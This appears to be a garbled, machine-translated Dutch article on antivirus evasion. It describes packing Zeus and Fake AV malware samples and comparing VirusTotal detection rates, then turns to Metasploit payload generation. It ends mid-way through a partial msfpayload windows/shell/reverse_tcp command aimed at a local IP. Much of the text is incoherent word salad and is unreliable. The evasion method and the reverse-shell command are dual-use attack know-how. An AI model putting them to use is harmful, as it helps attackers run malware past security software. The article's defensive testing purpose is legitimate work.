, een kort overzicht van de New York Times, eind januari over China 's netwerk voor de slachtoffers van de aanvallen van activiteiten, waarvan is gebleken dat ten minste vier maanden.Is van mening dat de aanvaller heeft de eerste toegang tot het netwerk van de banden, gebruik dan de geldige legitimatie via een netwerk van meer dan vier werknemers en de computer doen hun manier te vinden, en de Chinese premier verhaal, journalisten, de identiteit van de bron.,,,,,, de vonken spatten, de Times, de aanvaller is geïnstalleerd in het verslag het netwerk van ten minste 45 een gewoonte in de malware, waarvan er slechts één door de anti - symantec Corporation is de kwaadaardige software te installeren in een systeem voor de opsporing van.In een ongebruikelijk, symantec heeft een reactie op de extra veiligheid. Op basis van de technologie van groot belang zijn, zoals de reputatie en het gedrag van de blokkade is gebaseerd.De verklaring voor de laatste regel is de kicker: "anti - software is niet genoeg." en,,,,,, voor het recht.De anti - virus op zich niet de bescherming van een particulier netwerk van kwaadaardige software, hoe geavanceerd of geavanceerde methodisch.De onderneming moet niet uitsluitend op het antivirus detectie netwerk van criminelen, omdat er zoveel verschillende methoden in hun verwijdering, tot wijziging van de executie.Wij zullen onderzoeken wat de geavanceerde technologie gebruiken om blijk te geven van de aanvaller, hoe moeilijk en verwarrend, het kan voor de identificatie van geavanceerde malware tegen.Er dient evenwel te worden opgemerkt dat de veiligheid van alle gezondheidswerkers moeten blijven zoeken naar nieuwe methoden die door de auteur van de belangrijke en kwaadaardige software wordt gebruikt is de ontwikkeling van de,,,,,,,,,, in de war, om te voorkomen dat de detectie van een aanvaller te voorkomen, door gebruik te maken van de technologie is de eerste - virus opsporen.Om te helpen de toepassing en ontwikkeling van personeel, de vermindering van de omvang van hun dossier te verlichten door de toewijzing van kwaadaardige software gebruiken, met de uitvoering van de inhoud van het dossier kan worden verward.Door het gebruik van kwaadaardige software - technologie, dat de wijziging van de code kunnen zij hun handtekening te omzeilen, op basis van een antivirus.Vele toepassingen kan worden gebruikt voor het comprimeren van, maar een van de meest populaire is bekend als de file (bestaande stompjes expliciet) uiteindelijk Packer.Het is open, kan uit de sourceforge.,, ik gebruik deze methode, de bekende malware monster dat de doeltreffendheid van de door de druk van de verwarring.Ik vind het helpen bij het verzamelen van monsters van malware, ontmoette ik in de loop van de jaren het testen van nieuwe strategieën voor het opsporen van de defensie en de verificatie.Ik koos de meest beruchte malware stammen in mijn collectie.Een van hen is het paard van Troje van de rassen van Zeus, door het anti - virus systeem niet ontdekt in 2012.De tweede is een ongelooflijk succesvolle chantage een variant van het virus is vergelijkbaar met het valse plaag van dienst in de hele wereld.,,,,, dat de twee oudste kwaadaardige software is makkelijk op te sporen in de monsters van de handtekening van een anti - virus van de producten op de markt van vandaag.Ik heb gratis Internet in de virustotal.com verdachte documenten, analyse en URL door verschillende, tot 46 van de anti - virus motor.De resultaten van de tests is Zeus 43 waargenomen van de anti - virus 46 42 en 45, de detectie van valse AV,,, loop ik door middel van een file van de verpakker, en nieuwe dossiers door de virustotal.com diensten en de resultaten werden vergeleken met de trojanen, vol. En Zeus kan ontsnappen een anti - virus motor 12, dit was te verwachten.Onverwachte bevindingen is het bepalen van de verschillende, door de belangrijkste motor van de anti - virus.De motor van Microsoft pakte dossiers niet volledig, maar symantec motor ingedeeld als "verdachte documenten. SECTOOL.,,,,,, en niet alleen van de kwaadaardige software voor de detectie van het type.De onderstaande lijst geeft, naast de mcafee, de meest bekende - motor zal ook van kwaadaardige software.Mr kunnen opsporen van kwaadaardige software, ondanks een herziening, ziet er veelbelovend uit.In het kader van een test is om na te gaan of als mcafee kan ook met een andere kwaadaardige software monster, uit de verpakking, de resultaten van de chantage van namaak - en verpakking van het paard van Troje dan beter van Zeus.3 - motor miste de opsporing, het verbeteren van de totale missen deze tijd tot 15.Dat is een motor voor de detectie van de verpakking te chanteren, niet uitvoeren van een kwaadaardige software, maar het is zeker niet alleen als vermeld in de tabel.,, mcafee en Microsoft doet het heel goed, voor deze test.Dit betekent echter niet dat een van deze anti - virus van motoren die op de bescherming van "beter dan alle andere.De test omvat alleen een compressor 2 verschillende documenten.De resultaten zijn totaal verschillend van het gebruik van verschillende monsters van malware of - instrumenten.Deze tests blijkt dat het gebruik van deze methode kan door de anti - virus motoren mogelijk is.Er zijn andere manieren kan worden gebruikt om alle mensen veel.,,,,, verpakking met behulp van indringende test kader,,,,,, ik de volgende tests door de penetratie van de Gemeenschap in het kader van Metasploit versie.Dit instrument is een bijdrage geleverd aan de ontwikkeling van het open en flexibiliteit.De kwetsbaarheid van de verpakking of de achterdeur, documenten die kunnen worden gebruikt in de capaciteit van de test is een belangrijke verhoging van de functie van een paar jaar geleden.Vele van de huidige formaat kunnen creëren van dit instrument, met inbegrip van pdf - en alle standaard Microsoft Office formaat.Het kan ook een file van Microsoft Windows programmeringsdocumenten standaard model.De gebruikers kunnen lopen zonder het te weten "boek." niet op de hoogte van het gewijzigd is.Dit is hoe een indringende test kunnen onttrekken aan de anti - virus software, en de auteur van een levendige, kwaadwillige code.,, ik liep een paar standaard Microsoft Windows file, met de volgende test. Percentage van de opsporing van virus,:,, de ramen /Shell /reverse_tcp msfpayload LHOST 192.168.1.75 Lport = = = = = = =